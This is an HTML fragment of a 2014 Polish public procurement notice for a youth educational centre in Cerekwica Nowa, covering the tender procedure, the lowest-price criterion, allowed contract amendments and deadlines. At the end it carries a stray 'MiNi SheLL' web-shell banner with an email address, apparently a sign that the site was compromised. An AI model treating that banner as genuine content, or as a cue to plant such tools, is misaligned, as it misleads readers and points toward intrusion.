<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość wprowadzenia korzystnych dla Zamawiającego
zmian w treść danej umowy.
2. Zamawiający przewiduje, na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych
(t.j. Dz. U. z 2007 r. Nr 223 poz. 1655 ze zm.), możliwość dokonania zmiany
umowy w formie aneksu pod następującymi warunkami:
2.1. zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie Wykonawcy,
w przypadku:
a) wprowadzenia zmian w dokumentacji co może powodować brak możliwości
dotrzymania pierwotnego terminu zakończenia realizacji zawartej umowy;
b) przerw w realizacji prac powstałych z przyczyn nie leżących po stronie Wykonawcy;
c) powierzenia przez Zamawiającego wykonania zamówień dodatkowych lub
robót zamiennych, jeżeli terminy ich powierzenia, rodzaj lub zakres uniemożliwiają
dotrzymanie pierwotnego terminu zakończenia realizacji umowy;
d) pisemnego uzgodnienia pomiędzy Stronami dotyczącego skróceniu terminu
zakończenia realizacji umowy;
e) konieczności uzyskania niemożliwych do przewidzenia na etapie planowania
inwestycji: danych, zgód lub pozwoleń osób trzecich lub właściwych
organów;
f) wstrzymania realizacji prac objętych umową, co uniemożliwia terminowe
zakończenie realizacji przedmiotu umowy.
2.2. zmiany dokonane według zasad zapisanych w umowie;
2.3. zmiana ceny przy zaistnieniu zmian stawek podatkowych lub stawek celnych
(znaczący wzrost cen czynników niezależnych od Wykonawcy).
2.4. zmiana danych identyfikacyjnych strony ujętych w treści umowy;
2.5. zmiana w zakresie wprowadzenia zapisu - informacji o przyznanym lub możliwym
dofinansowaniu ze źródeł zewnętrznych;
2.6. zmiana formy zabezpieczenia należytego wykonania umowy.
2.7. zmniejszenie zakresu wynagrodzenia z przyczyn o obiektywnym charakterze,
istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji
umowy nie leży w interesie publicznym, czego nie można było przewidzieć
w chwili jej zawarcia;
2.8. w związku z finansowaniem zadania inwestycyjnego ze środków zewnętrznych
Zamawiający zastrzega sobie możliwość spowolnienia lub chwilowych przerw
w realizacji robót. Wykonawca zostanie poinformowany o zaistniałej sytuacji,
zostanie wówczas sporządzony stosowny - jeżeli będzie miało to zastosowanie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cerekwica-mow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Młodzieżowy Ośrodek Wychowawczy w Cerekwicy Nowej, 63-233 Jaraczewo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.09.2014 godzina 10:00, miejsce: Młodzieżowy Ośrodek Wychowawczy w Cerekwicy Nowej, 63-233 Jaraczewo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com